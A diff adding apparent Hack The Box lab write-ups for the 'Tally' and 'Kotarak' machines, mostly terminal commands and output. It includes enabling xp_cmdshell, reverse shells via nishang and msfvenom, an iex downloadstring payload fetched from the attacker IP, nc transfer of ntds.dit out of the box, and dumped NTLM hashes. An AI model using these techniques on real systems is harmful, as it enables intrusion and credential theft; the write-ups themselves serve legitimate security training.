+ -rwxr-xr-x 1 root root 215552 Sep 1 2017 tester.exe
+ -rwxr-xr-x 1 root root 7194312 Sep 13 2017 vcredist_x64.exe
+
+
+
+And here you had to extract passwords out of tester.exe using strings:
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/9 ] [zz_Migration/Binaries/New Folder]
+ → strings tester.exe | grep SQL
+ SQLSTATE:
+ DRIVER={SQL Server};SERVER=TALLY, 1433;DATABASE=orcharddb;UID=sa;PWD=GWE3V65#6KFH93@4GWTG2G;
+
+
+
+So here we have credentials for a SQL server on port 1433 : sa:GWE3V65#6KFH93@4GWTG2G
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/11 ] [~]
+ → sqsh -S 10.10.10.59 -U sa -P GWE3V65#6KFH93@4GWTG2G
+ sqsh-2.5.16.1 Copyright (C) 1995-2001 Scott C. Gray
+ Portions Copyright (C) 2004-2014 Michael Peppler and Martin Wesdorp
+ This is free software with ABSOLUTELY NO WARRANTY
+ For more information type '\warranty'
+ 1> xp_cmdshell 'id'
+ 2> go
+ Msg 15281, Level 16, State 1
+ Server 'TALLY', Procedure 'xp_cmdshell', Line 1
+ SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the
+ security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more
+ information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
+ 1>
+
+
+
+So we're connected but component xp_cmdshell is turned off, so let's turn it on:
+
+
+ 1> EXEC SP_CONFIGURE 'xp_cmdshell',1
+ 2> reconfigure
+ 3> go
+ Msg 15123, Level 16, State 1
+ Server 'TALLY', Procedure 'sp_configure', Line 62
+ The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
+ (return status = 1)
+
+
+
+And it seems like the xp_cmdshell option doesn't exist, so let's enable advanced options:
+
+
+ 1> EXEC SP_CONFIGURE 'show advanced options', 1
+ 2> reconfigure
+ 3> go
+ Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
+ (return status = 0)
+ 1> EXEC SP_CONFIGURE 'xp_cmdshell', 1
+ 2> reconfigure
+ 3> go
+ Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
+ (return status = 0)
+
+ 1> xp_cmdshell "whoami"
+ 2> go
+
+ output
+ -------------------------------------------------------------------------------------------------------------------------------------
+ ---------------------------------------------------------------------------------------------------------------------------------------------
+ ---------------------------------------------------------------------------------------------------------------------------------------------
+ -------------------------------------------------------------------------------------------------
+
+ tally\sarah
+ NULL
+ (2 rows affected, return status = 0)
+
+
+And there we have it, we have code execution as the sarah user:
+
+
+
+ 1> xp_cmdshell "whoami /priv"
+ 2> go
+ output
+ -------------------------------------------------------------------------------------------------------------------------------------
+ ---------------------------------------------------------------------------------------------------------------------------------------------
+ ---------------------------------------------------------------------------------------------------------------------------------------------
+ -------------------------------------------------------------------------------------------------
+
+ NULL
+ PRIVILEGES INFORMATION
+ ----------------------
+ NULL
+ Privilege Name Description State
+ ============================= ========================================= ========
+ SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
+ SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
+ SeChangeNotifyPrivilege Bypass traverse checking Enabled
+ **SeImpersonatePrivilege Impersonate a client after authentication Enabled**
+ SeCreateGlobalPrivilege Create global objects Enabled
+ SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
+ NULL
+ (13 rows affected, return status = 0)
+
+
+And here we see that the SeImpersonatePrivilege is set to enabled therefore we should be able to do rottenpotato on this machine, but before that let's get a reverse shell using nishang's [InvokePowershellTcp.ps1](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1)
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/14 ] [~/_HTB/Tally]
+ → wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
+ --2020-12-23 17:21:02-- https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
+ Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.36.133
+ Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.36.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 4339 (4.2K) [text/plain]
+ Saving to: ‘Invoke-PowerShellTcp.ps1’
+
+ Invoke-PowerShellTcp.ps1 100%[=======================================>] 4.24K --.-KB/s in 0s
+
+ 2020-12-23 17:21:02 (21.8 MB/s) - ‘Invoke-PowerShellTcp.ps1’ saved [4339/4339]
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/14 ] [~/_HTB/Tally]
+ → echo 'Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.6 -Port 9001' >> Invoke-PowerShellTcp.ps1
+
+ [ 10.10.14.6/23 ] [ /dev/pts/14 ] [~/_HTB/Tally]
+ → cat Invoke-PowerShellTcp.ps1 | tail -n2
+
+ Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.6 -Port 9001
+
+ [ 10.10.14.6/23 ] [ /dev/pts/14 ] [~/_HTB/Tally]
+ → cat Invoke-PowerShellTcp.ps1 | tail -n5
+ Write-Error $_
+ }
+ }
+
+ Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.6 -Port 9001
+
+ [ 10.10.14.6/23 ] [ /dev/pts/14 ] [~/_HTB/Tally]
+ → mv Invoke-PowerShellTcp.ps1 rev9001.ps1
+
+
+
+`  
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/25 ] [~/_HTB/Tally]
+ → nc -lvnp 9001
+ listening on [any] 9001 ...
+ connect to [10.10.14.6] from (UNKNOWN) [10.10.10.59] 56942
+ Windows PowerShell running as user Sarah on TALLY
+ Copyright (C) 2015 Microsoft Corporation. All rights reserved.
+
+ PS C:\Windows\system32>whoami
+ tally\sarah
+ PS C:\Windows\system32> cd /
+ PS C:\> cd Users
+ PS C:\Users> dir
+
+
+ Directory: C:\Users
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ d----- 18/09/2017 22:35 .NET v2.0
+ d----- 18/09/2017 22:35 .NET v2.0 Classic
+ d----- 30/08/2017 01:14 .NET v4.5
+ d----- 30/08/2017 01:14 .NET v4.5 Classic
+ d----- 17/09/2017 21:33 Administrator
+ d----- 18/09/2017 22:35 Classic .NET AppPool
+ d-r--- 21/11/2016 01:24 Public
+ d----- 13/10/2017 23:57 Sarah
+ d----- 12/10/2017 21:28 SQLSERVERAGENT
+ d----- 02/09/2017 22:46 SQLTELEMETRY
+ d----- 13/09/2017 21:27 Tim
+
+
+ PS C:\Users> cd Sarah
+ PS C:\Users\Sarah> cd Desktop
+ PS C:\Users\Sarah\Desktop> dir
+
+
+ Directory: C:\Users\Sarah\Desktop
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ -ar--- 01/10/2017 22:32 916 browser.bat
+ -a---- 17/09/2017 21:50 845 FTP.lnk
+ -a---- 23/09/2017 21:11 297 note to tim (draft).txt
+ -a---- 19/10/2017 21:49 17152 SPBestWarmUp.ps1
+ -a---- 19/10/2017 22:48 11010 SPBestWarmUp.xml
+ -a---- 17/09/2017 21:48 1914 SQLCMD.lnk
+ -a---- 21/09/2017 00:46 129 todo.txt
+ -ar--- 31/08/2017 02:04 32 user.txt
+ -a---- 17/09/2017 21:49 936 zz_Migration.lnk
+
+
+ PS C:\Users\Sarah\Desktop> type user.txt
+ beXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And there you go! We have been able to print out the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now in order to privesc on this box we need to first take a look at sarah's desktop files:
+
+
+
+ PS C:\Users\Sarah\Desktop> dir
+
+
+ Directory: C:\Users\Sarah\Desktop
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ -ar--- 01/10/2017 22:32 916 browser.bat
+ -a---- 17/09/2017 21:50 845 FTP.lnk
+ -a---- 23/09/2017 21:11 297 note to tim (draft).txt
+ -a---- 19/10/2017 21:49 17152 SPBestWarmUp.ps1
+ -a---- 19/10/2017 22:48 11010 SPBestWarmUp.xml
+ -a---- 17/09/2017 21:48 1914 SQLCMD.lnk
+ -a---- 21/09/2017 00:46 129 todo.txt
+ -ar--- 31/08/2017 02:04 32 user.txt
+ -a---- 17/09/2017 21:49 936 zz_Migration.lnk
+
+
+ PS C:\Users\Sarah\Desktop> type "note to tim (draft).txt"
+ Hi Tim,
+
+ As discussed in the cybersec meeting, malware is often hidden in trusted executables in order to evade detection. I read somewhere that cmd.exe is a common target for backdooring, so I've gone ahead and disallowed any cmd.exe outside the Windows folder from executing.
+
+ Thanks,
+ Sarah
+
+
+
+Basically here there are multiple ways to privesc, the first one being found in SPBestWarmUp.ps1 which basically is a script we can write to that is being executed every hour by the administrator account, so we're going to put in our second reverse shell payload:
+
+
+ PS C:\Users\Sarah\Desktop> echo "iex(new-object net.webclient).downloadstring('http://10.10.14.6:9005/rev9006.ps1')" > SPBestWarmUp.ps1
+
+
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/25 ] [~/_HTB/Tally]
+ → nc -lvnp 9006
+ listening on [any] 9006 ...
+ connect to [10.10.14.6] from (UNKNOWN) [10.10.10.59] 56986
+ Windows PowerShell running as user Administrator on TALLY
+ Copyright (C) 2015 Microsoft Corporation. All rights reserved.
+
+ PS C:\Users\Sarah\Desktop>whoami
+ tally\administrator
+
+ PS C:\Users\Sarah\Desktop>cd C:\Users\Administrator\Desktop
+
+ PS C:\Users\Administrator\Desktop>type root.txt
+ 60XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And there we have it!
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Hard/7.md b/Hard/7.md
new file mode 100644
index 0000000..910cc56
--- /dev/null
+++ b/Hard/7.md
@@ -0,0 +1,628 @@
+# Kotarak Writeup
+
+
+
+## Introduction :
+
+Kotarak is a hard linux box released back in september 2017.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/2 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.55 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+ [sudo] password for nothing:
+ Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
+ Discovered open port 8080/tcp on 10.10.10.55
+ Discovered open port 22/tcp on 10.10.10.55
+ Discovered open port 8009/tcp on 10.10.10.55
+ Discovered open port 60000/tcp on 10.10.10.55
+
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/2 ] [~]
+ → sudo nmap -sCV -p8080,22,8009,60000 10.10.10.55
+ Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-21 22:50 CET
+ Nmap scan report for 10.10.10.55
+ Host is up (0.034s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 2048 e2:d7:ca:0e:b7:cb:0a:51:f7:2e:75:ea:02:24:17:74 (RSA)
+ | 256 e8:f1:c0:d3:7d:9b:43:73:ad:37:3b:cb:e1:64:8e:e9 (ECDSA)
+ |_ 256 6d:e9:26:ad:86:02:2d:68:e1:eb:ad:66:a0:60:17:b8 (ED25519)
+ 8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
+ | ajp-methods:
+ | Supported methods: GET HEAD POST PUT DELETE OPTIONS
+ | Potentially risky methods: PUT DELETE
+ |_ See https://nmap.org/nsedoc/scripts/ajp-methods.html
+ 8080/tcp open http Apache Tomcat 8.5.5
+ |_http-favicon: Apache Tomcat
+ | http-methods:
+ |_ Potentially risky methods: PUT DELETE
+ |_http-title: Apache Tomcat/8.5.5 - Error report
+ 60000/tcp open http Apache httpd 2.4.18 ((Ubuntu))
+ |_http-server-header: Apache/2.4.18 (Ubuntu)
+ |_http-title: Kotarak Web Hosting
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 52.68 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+As our nmap scan points out, port 8080 seems to be interesting so let's investigate it:
+
+
+
+Most apache tomcat services have an important directory in /manager/html as you can see:
+
+
+
+Now here you can't bruteforce the password here because the service will block the account so let's keep poking around another port that our nmap scan picked up:
+
+
+
+and here we get an interesting page with a url prompt so we're going to use burpsuite's repeater on it:
+
+  
+
+So here we see there's a regex that matches the word file so we can't print out the files on the machine, next is we try if we can find local ports:
+
+
+
+It works for port 60000 but we know that already, let's use wfuzz to enumerate:
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/7 ] [~/_HTB/Kotarak]
+ → wfuzz -c -z range,1-65535 http://10.10.10.55:60000/url.php\?path\=http://localhost:FUZZ
+ /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
+ ********************************************************
+ * Wfuzz 3.1.0 - The Web Fuzzer *
+ ********************************************************
+
+ Target: http://10.10.10.55:60000/url.php?path=http://localhost:FUZZ
+ Total requests: 65535
+
+ =====================================================================
+ ID Response Lines Word Chars Payload
+ =====================================================================
+
+ 000000001: 200 2 L 0 W 2 Ch "1"
+ 000000039: 200 2 L 0 W 2 Ch "39"
+ 000000015: 200 2 L 0 W 2 Ch "15"
+ 000000003: 200 2 L 0 W 2 Ch "3"
+ 000000007: 200 2 L 0 W 2 Ch "7"
+ 000000031: 200 2 L 0 W 2 Ch "31"
+ 000000034: 200 2 L 0 W 2 Ch "34"
+ 000000033: 200 2 L 0 W 2 Ch "33"
+ 000000030: 200 2 L 0 W 2 Ch "30"
+ 000000029: 200 2 L 0 W 2 Ch "29"
+ 000000032: 200 2 L 0 W 2 Ch "32"
+ 000000028: 200 2 L 0 W 2 Ch "28"[ 10.10.14.6/23 ] [ /dev/pts/18 ] [~]
+ → msfvenom -l payloads
+
+ 000000038: 200 2 L 0 W 2 Ch "38"
+ 000000027: 200 2 L 0 W 2 Ch "27"
+ 000000023: 200 2 L 0 W 2 Ch "23"
+ 000000024: 200 2 L 0 W 2 Ch "24"
+ 000000025: 200 2 L 0 W 2 Ch "25"
+ 000000026: 200 2 L 0 W 2 Ch "26"
+ 000000022: 200 4 L 4 W 62 Ch "22"
+ 000000021: 200 2 L 0 W 2 Ch "21"
+ 000000020: 200 2 L 0 W 2 Ch "20"
+ 000000014: 200 2 L 0 W 2 Ch "14"
+ 000000017: 200 2 L 0 W 2 Ch "17"
+ 000000018: 200 2 L 0 W 2 Ch "18"
+ 000000019: 200 2 L 0 W 2 Ch "19"
+ 000000016: 200 2 L 0 W 2 Ch "16"
+ 000000013: 200 2 L 0 W 2 Ch "13"
+ 000000012: 200 2 L 0 W 2 Ch "12"
+ 000000008: 200 2 L 0 W 2 Ch "8"
+ 000000011: 200 2 L 0 W 2 Ch "11"
+ 000000009: 200 2 L 0 W 2 Ch "9"
+ 000000006: 200 2 L 0 W 2 Ch "6"
+ 000000010: 200 2 L 0 W 2 Ch "10"
+ 000000005: 200 2 L 0 W 2 Ch "5"
+ 000000002: 200 2 L 0 W 2 Ch "2"
+ 000000054: 200 2 L 0 W 2 Ch "54"
+ 000000004: 200 2 L 0 W 2 Ch "4"
+ 000000042: 200 2 L 0 W 2 Ch "42"
+ 000000046: 200 2 L 0 W 2 Ch "46"
+
+
+
+here we can see the junk responses that are only 2 responses characters long, therefore we're going to filter out the 2 chars long responses with the option --hl=2 :
+
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/7 ] [~/_HTB/Kotarak]
+ → wfuzz -c -z range,1-65535 --hl=2 http://10.10.10.55:60000/url.php\?path\=http://localhost:FUZZ
+ /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
+ ********************************************************
+ * Wfuzz 3.1.0 - The Web Fuzzer *
+ ********************************************************
+
+ Target: http://10.10.10.55:60000/url.php?path=http://localhost:FUZZ
+ Total requests: 65535
+
+ =====================================================================
+ ID Response Lines Word Chars Payload
+ =====================================================================
+
+ 000000022: 200 4 L 4 W 62 Ch "22"
+ 000000090: 200 11 L 18 W 156 Ch "90"
+ 000000110: 200 17 L 24 W 187 Ch "110"
+ 000000200: 200 3 L 2 W 22 Ch "200"
+ 000000320: 200 26 L 109 W 1232 Ch "320"
+ 000000888: 200 78 L 265 W 3955 Ch "888"
+
+ Total time: 262.3381
+ Processed Requests: 54927
+ Filtered Requests: 54921
+ Requests/sec.: 209.3748
+
+ /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:78: UserWarning:Fatal exception: Pycurl error 28: Operation timed out after 90000 milliseconds with 0 bytes received
+
+
+
+So here we have a few interesting responses : port 22, 90, 110, 200, 320, and 888. you would have to test each one of them but the important one right now is 888:
+
+
+
+Do ctrl+U to view sourcecode:
+
+
+
+and navigate to ?doc=backup:
+
+
+
+select url and CTRL+U to url encode it:
+
+
+
+and we found some credentials ! admin:3@g01PdhB! So let's try to login on the tomcat login page we found earlier at http://10.10.10.55:8080/manager/html
+
+
+
+And we now have access to the tomcat web manager, From here we want to upload a malicious WAR file to get us a shell.
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/18 ] [~]
+ → msfvenom -l payloads | grep java
+ java/jsp_shell_bind_tcp Listen for a connection and spawn a command shell
+ java/jsp_shell_reverse_tcp Connect back to attacker and spawn a command shell
+ java/meterpreter/bind_tcp Run a meterpreter server in Java. Listen for a connection
+ java/meterpreter/reverse_http Run a meterpreter server in Java. Tunnel communication over HTTP
+ java/meterpreter/reverse_https Run a meterpreter server in Java. Tunnel communication over HTTPS
+ java/meterpreter/reverse_tcp Run a meterpreter server in Java. Connect back stager
+ java/shell/bind_tcp Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else). Listen for a connection
+ java/shell/reverse_tcp Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else). Connect back stager
+ java/shell_reverse_tcp Connect back to attacker and spawn a command shell
+
+
+
+Here we want msvenom's java/jsp_shell_reverse_tcp
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/18 ] [~/_HTB/Kotarak]
+ → msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.6 LPORT=9090 -f war > ippsecrocks.war
+ Payload size: 1093 bytes
+ Final size of war file: 1093 bytes
+
+ [ 10.10.14.6/23 ] [ /dev/pts/18 ] [~/_HTB/Kotarak]
+ → l
+ total 12K
+ drwxr-xr-x 2 nothing nothing 4.0K Dec 22 14:17 .
+ drwxr-xr-x 5 nothing nothing 4.0K Dec 21 17:43 ..
+ -rw-r--r-- 1 nothing nothing 1.1K Dec 22 14:17 ippsecrocks.war
+
+
+
+`  
+
+Now that we got a shell, let's upgrade it to a fully interactive shell:
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/15 ] [~]
+ → nc -lvnp 9090
+ listening on [any] 9090 ...
+ connect to [10.10.14.6] from (UNKNOWN) [10.10.10.55] 42176
+ id
+ uid=1001(tomcat) gid=1001(tomcat) groups=1001(tomcat)
+ which python
+ /usr/bin/python
+ python -c 'import pty;pty.spawn("/bin/bash")'
+ tomcat@kotarak-dmz:/$ ^Z
+ [1] + 257499 suspended nc -lvnp 9090
+
+ [ 10.10.14.6/23 ] [ /dev/pts/15 ] [~]
+ → stty raw -echo ; fg
+ [1] + 257499 continued nc -lvnp 9090
+
+ tomcat@kotarak-dmz:/$
+
+
+What you need to remember to get a fully interactive reverse shell is the following:
+
+
+ python -c 'import pty;pty.spawn("/bin/bash")'
+ CTRL+Z (or ^Z)
+ stty raw -echo ; fg
+ export TERM=screen-256color
+ export SHELL=bash
+ stty rows 40 columns 125
+ reset
+
+
+
+And now here we have a shell that we can clear, auto-complete and use vi from.
+
+
+
+ tomcat@kotarak-dmz:/$ id
+ uid=1001(tomcat) gid=1001(tomcat) groups=1001(tomcat)
+ tomcat@kotarak-dmz:/$ ls -lash backups/
+ total 12K
+ 4.0K drwxr-xr-x 3 root root 4.0K Jul 21 2017 .
+ 4.0K drwxr-xr-x 27 root root 4.0K Aug 29 2017 ..
+ 4.0K drwxr-xr-x 2 root root 4.0K Jul 21 2017 backups
+ tomcat@kotarak-dmz:/$ ls -lash backups/backups/
+ total 12K
+ 4.0K drwxr-xr-x 2 root root 4.0K Jul 21 2017 .
+ 4.0K drwxr-xr-x 3 root root 4.0K Jul 21 2017 ..
+ 4.0K -rw-r----- 1 root root 2.3K Jul 12 2017 tomcat-users.xml
+ tomcat@kotarak-dmz:/$ cat backups/backups/tomcat-users.xml
+ cat: backups/backups/tomcat-users.xml: Permission denied
+ tomcat@kotarak-dmz:/$ ls -lash /home
+ total 16K
+ 4.0K drwxr-xr-x 4 root root 4.0K Jul 21 2017 .
+ 4.0K drwxr-xr-x 27 root root 4.0K Aug 29 2017 ..
+ 4.0K drwxr-xr-x 4 atanas atanas 4.0K Aug 29 2017 atanas
+ 4.0K drwxr-xr-x 3 tomcat tomcat 4.0K Jul 21 2017 tomcat
+ tomcat@kotarak-dmz:/$ ls -lash /home/tomcat/
+ total 12K
+ 4.0K drwxr-xr-x 3 tomcat tomcat 4.0K Jul 21 2017 .
+ 4.0K drwxr-xr-x 4 root root 4.0K Jul 21 2017 ..
+ 4.0K drwxr-xr-x 3 tomcat tomcat 4.0K Jul 21 2017 to_archive
+ tomcat@kotarak-dmz:/$ ls -lash /home/tomcat/to_archive/
+ total 12K
+ 4.0K drwxr-xr-x 3 tomcat tomcat 4.0K Jul 21 2017 .
+ 4.0K drwxr-xr-x 3 tomcat tomcat 4.0K Jul 21 2017 ..
+ 4.0K drwxr-xr-x 2 tomcat tomcat 4.0K Jul 21 2017 pentest_data
+ tomcat@kotarak-dmz:/$ ls -lash /home/tomcat/to_archive/pentest_data/
+ total 28M
+ 4.0K drwxr-xr-x 2 tomcat tomcat 4.0K Jul 21 2017 .
+ 4.0K drwxr-xr-x 3 tomcat tomcat 4.0K Jul 21 2017 ..
+ 17M -rw-r--r-- 1 tomcat tomcat 17M Jul 21 2017 20170721114636_default_192.168.110.133_psexec.ntdsgrab._333512.dit
+ 12M -rw-r--r-- 1 tomcat tomcat 12M Jul 21 2017 20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin
+
+
+Here after poking around a bit we found psexec ntds .dit and .bin files, which are normally found on windows active directory controllers, and it's what contains a windows active directory informations (policies, users, and most importantly passwords.) so let's get these files into our local machine:
+
+_Terminal 1:_
+
+
+ nc 10.10.14.6 9093 < file.bin
+ nc 10.10.14.6 9094 < file.dit
+
+
+` _Terminal 2:_
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/15 ] [~/_HTB/Kotarak]
+ → nc -lvnp 9093 > SYSTEM
+ listening on [any] 9093 ...
+ connect to [10.10.14.6] from (UNKNOWN) [10.10.10.55] 48340
+
+ [ 10.10.14.6/23 ] [ /dev/pts/15 ] [~/_HTB/Kotarak]
+ → nc -lvnp 9094 > ntds.dit
+ listening on [any] 9094 ...
+ connect to [10.10.14.6] from (UNKNOWN) [10.10.10.55] 32822
+
+ [ 10.10.14.6/23 ] [ /dev/pts/15 ] [~/_HTB/Kotarak]
+ → file *
+ ntds.dit: Extensible storage engine DataBase, version 0x620, checksum 0x16d44752, page size 8192, DirtyShutdown, Windows version 6.1
+ SYSTEM: MS Windows registry file, NT/2000 or above
+
+
+
+Now that we have what we needed, let's use impacket to dump the secrets using both files:
+
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/18 ] [~/_HTB/Kotarak]
+ → impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
+ Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
+
+ [*] Target system bootKey: 0x14b6fb98fedc8e15107867c4722d1399
+ [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
+ [*] Searching for pekList, be patient
+ [*] PEK # 0 found and decrypted: d77ec2af971436bccb3b6fc4a969d7ff
+ [*] Reading and decrypting hashes from ntds.dit
+ Administrator:500:aad3b435b51404eeaad3b435b51404ee:e64fe0f24ba2489c05e64354d74ebd11:::
+ Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
+ WIN-3G2B0H151AC$:1000:aad3b435b51404eeaad3b435b51404ee:668d49ebfdb70aeee8bcaeac9e3e66fd:::
+ krbtgt:502:aad3b435b51404eeaad3b435b51404ee:ca1ccefcb525db49828fbb9d68298eee:::
+ WIN2K8$:1103:aad3b435b51404eeaad3b435b51404ee:160f6c1db2ce0994c19c46a349611487:::
+ WINXP1$:1104:aad3b435b51404eeaad3b435b51404ee:6f5e87fd20d1d8753896f6c9cb316279:::
+ WIN2K31$:1105:aad3b435b51404eeaad3b435b51404ee:cdd7a7f43d06b3a91705900a592f3772:::
+ WIN7$:1106:aad3b435b51404eeaad3b435b51404ee:24473180acbcc5f7d2731abe05cfa88c:::
+ atanas:1108:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
+ [*] Kerberos keys from ntds.dit
+ Administrator:aes256-cts-hmac-sha1-96:6c53b16d11a496d0535959885ea7c79c04945889028704e2a4d1ca171e4374e2
+ Administrator:aes128-cts-hmac-sha1-96:e2a25474aa9eb0e1525d0f50233c0274
+ Administrator:des-cbc-md5:75375eda54757c2f
+ WIN-3G2B0H151AC$:aes256-cts-hmac-sha1-96:84e3d886fe1a81ed415d36f438c036715fd8c9e67edbd866519a2358f9897233
+ WIN-3G2B0H151AC$:aes128-cts-hmac-sha1-96:e1a487ca8937b21268e8b3c41c0e4a74
+ WIN-3G2B0H151AC$:des-cbc-md5:b39dc12a920457d5
+ WIN-3G2B0H151AC$:rc4_hmac:668d49ebfdb70aeee8bcaeac9e3e66fd
+ krbtgt:aes256-cts-hmac-sha1-96:14134e1da577c7162acb1e01ea750a9da9b9b717f78d7ca6a5c95febe09b35b8
+ krbtgt:aes128-cts-hmac-sha1-96:8b96c9c8ea354109b951bfa3f3aa4593
+ krbtgt:des-cbc-md5:10ef08047a862046
+ krbtgt:rc4_hmac:ca1ccefcb525db49828fbb9d68298eee
+ WIN2K8$:aes256-cts-hmac-sha1-96:289dd4c7e01818f179a977fd1e35c0d34b22456b1c8f844f34d11b63168637c5
+ WIN2K8$:aes128-cts-hmac-sha1-96:deb0ee067658c075ea7eaef27a605908
+ WIN2K8$:des-cbc-md5:d352a8d3a7a7380b
+ WIN2K8$:rc4_hmac:160f6c1db2ce0994c19c46a349611487
+ WINXP1$:aes256-cts-hmac-sha1-96:347a128a1f9a71de4c52b09d94ad374ac173bd644c20d5e76f31b85e43376d14
+ WINXP1$:aes128-cts-hmac-sha1-96:0e4c937f9f35576756a6001b0af04ded
+ WINXP1$:des-cbc-md5:984a40d5f4a815f2
+ WINXP1$:rc4_hmac:6f5e87fd20d1d8753896f6c9cb316279
+ WIN2K31$:aes256-cts-hmac-sha1-96:f486b86bda928707e327faf7c752cba5bd1fcb42c3483c404be0424f6a5c9f16
+ WIN2K31$:aes128-cts-hmac-sha1-96:1aae3545508cfda2725c8f9832a1a734
+ WIN2K31$:des-cbc-md5:4cbf2ad3c4f75b01
+ WIN2K31$:rc4_hmac:cdd7a7f43d06b3a91705900a592f3772
+ WIN7$:aes256-cts-hmac-sha1-96:b9921a50152944b5849c706b584f108f9b93127f259b179afc207d2b46de6f42
+ WIN7$:aes128-cts-hmac-sha1-96:40207f6ef31d6f50065d2f2ddb61a9e7
+ WIN7$:des-cbc-md5:89a1673723ad9180
+ WIN7$:rc4_hmac:24473180acbcc5f7d2731abe05cfa88c
+ atanas:aes256-cts-hmac-sha1-96:933a05beca1abd1a1a47d70b23122c55de2fedfc855d94d543152239dd840ce2
+ atanas:aes128-cts-hmac-sha1-96:d1db0c62335c9ae2508ee1d23d6efca4
+ atanas:des-cbc-md5:6b80e391f113542a
+ [*] Cleaning up...
+
+
+
+Out of these hashes we want the following:
+
+
+ Administrator:500:aad3b435b51404eeaad3b435b51404ee:e64fe0f24ba2489c05e64354d74ebd11:::
+ atanas:1108:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
+
+
+
+it's quite odd to have windows stuff on that linux machine, so let's see which machines our reverse shell'd machine can talk to / is currently talking to:
+
+
+ tomcat@kotarak-dmz:/home/tomcat/to_archive/pentest_data$ arp -a
+ ? (10.0.3.133) at 00:16:3e:c9:bd:b1 [ether] on lxcbr0
+ ? (10.10.10.2) at 00:50:56:b9:35:90 [ether] on eth0
+
+ tomcat@kotarak-dmz:/home/tomcat/to_archive/pentest_data$ nc -v 10.0.3.133 22
+ Connection to 10.0.3.133 22 port [tcp/ssh] succeeded!
+ SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.2
+
+
+
+However it seems like the box kotarak is talking to isn't a windows machine. Therefore we'll need to crack the hashes we got
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/15 ] [~/_HTB/Kotarak]
+ → vim hashes
+
+ Administrator:500:aad3b435b51404eeaad3b435b51404ee:e64fe0f24ba2489c05e64354d74ebd11:::
+ atanas:1108:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
+
